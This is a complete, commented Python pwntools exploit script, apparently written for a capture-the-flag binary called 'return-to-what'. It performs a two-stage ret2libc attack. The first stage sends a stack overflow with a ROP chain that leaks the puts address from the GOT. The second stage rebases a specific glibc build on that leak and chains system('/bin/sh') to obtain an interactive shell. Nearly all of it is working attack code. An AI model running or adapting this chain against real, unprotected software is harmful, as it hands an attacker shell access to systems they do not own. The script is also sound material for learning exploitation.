#!/usr/bin/env python
# Two-stage ROP script for the local binary "./return-to-what":
#   stage 1 leaks the runtime address of puts through the GOT and returns
#   into vuln so the program can be overflowed a second time;
#   stage 2 rebases a known libc build on that leak and returns into
#   puts/system/exit.
# Every statement below is an ordered interaction with a live process, so
# the sequence of send/recv calls must not be reordered.
# Assumes the target lacks the mitigations that would stop a plain
# stack-based overflow -- not checkable from this script, confirm against
# the binary (e.g. with pwntools' checksec output).
from pwn import *
from pprint import pprint
# Architecture for ROP gadget search and u64/p64 packing.
context.arch = 'amd64'
# Number of filler bytes before the saved return address is overwritten.
offset = 56
elf = ELF("./return-to-what")
p = elf.process()
rop = ROP(elf)
# Stage 1: puts(puts@GOT) prints the resolved libc address of puts, then
# return into vuln so a second payload can be delivered.
rop.call(elf.symbols["puts"],[elf.got['puts']])
rop.call(elf.symbols["vuln"])
# Consume the program's banner lines before sending the payload.
print(p.recvuntil("\n"))
print(p.recvuntil("\n"))
payload = [
b"A" * offset,
rop.chain()
]
payload = b"".join(payload)
p.sendline(payload)
# puts stops at the first NUL byte, so the leaked address arrives as fewer
# than 8 bytes; pad with zeros on the right before unpacking little-endian.
puts = u64(p.recvuntil("\n").rstrip().ljust(8, b'\x00'))
log.info(f"puts found at {hex(puts)}")
# p.interactive()
# Get the above puts address and check in libc database for puts with the hex value
# We can download the glibc from libc database
# The libc file named here must be the exact build the target loaded;
# a mismatch gives wrong symbol offsets and the second stage will not work.
libc = ELF("libc6_2.27-3ubuntu1_amd64.so")
# Rebase the libc ELF so its symbols resolve to runtime addresses.
# Sanity check: a libc base is page-aligned, so hex(libc.address) should end
# in 000 ("3 trailing zeros"); anything else means the wrong libc build.
libc.address = puts - libc.symbols["puts"] # Must have 3 trailing zeros
rop = ROP(libc)
# Stage 2: puts("/bin/sh") as a visible confirmation the rebase is right,
# then system("/bin/sh"), then exit so the process terminates cleanly.
rop.call("puts", [next(libc.search(b"/bin/sh\x00"))])
rop.call("system", [next(libc.search(b"/bin/sh\x00"))])
rop.call("exit")
payload = [
b"A" * offset,
rop.chain()
]
payload = b"".join(payload)
p.sendline(payload)
p.interactive()